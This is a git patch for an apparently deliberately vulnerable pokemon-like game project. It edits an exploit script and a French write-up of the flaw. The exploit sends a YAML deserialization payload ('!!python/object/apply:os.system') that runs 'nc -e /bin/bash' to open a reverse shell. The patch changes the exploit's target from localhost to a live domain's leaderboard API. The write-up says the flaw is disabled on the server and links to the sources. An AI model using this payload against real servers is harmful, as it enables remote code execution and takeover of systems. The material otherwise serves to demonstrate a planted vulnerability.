From a0d1be96b6b58c5a930a077f784e8981bc4c7f10 Mon Sep 17 00:00:00 2001 From: furtest Date: Sun, 14 Dec 2025 19:52:49 +0100 Subject: [PATCH] Add uncommited documents --- exploit.py | 3 ++- faille.md | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/exploit.py b/exploit.py index be244c8..9de0ee9 100644 --- a/exploit.py +++ b/exploit.py @@ -3,7 +3,8 @@ import requests malicious_yaml = """ !!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"] """ -url = "http://127.0.0.1:8080/api/leaderboard" +#url = "http://127.0.0.1:8080/api/leaderboard" +url = "http://libremon.furtest.fr/api/leaderboard" headers = { "Content-Type": "text/yaml" } diff --git a/faille.md b/faille.md index 39fdb6b..eb86408 100644 --- a/faille.md +++ b/faille.md @@ -4,7 +4,7 @@ Nous avons réalisé un jeu pokemon-like où les logiciels libres et propriétai La faille est intégré dans le leaderboard, pour des raisons de sécurité elle est désactivé sur le serveur mais vous pouvez la trouvez en téléchargant les sources du site au lien suivant. -LIEN +https://share.furtest.fr/app/open/8v6M1zn6FZn-qUTvevvP8Wc-LFiYonS6ZTo-wYG6RmQWCXu?view=1 # Fonctionnement de la faille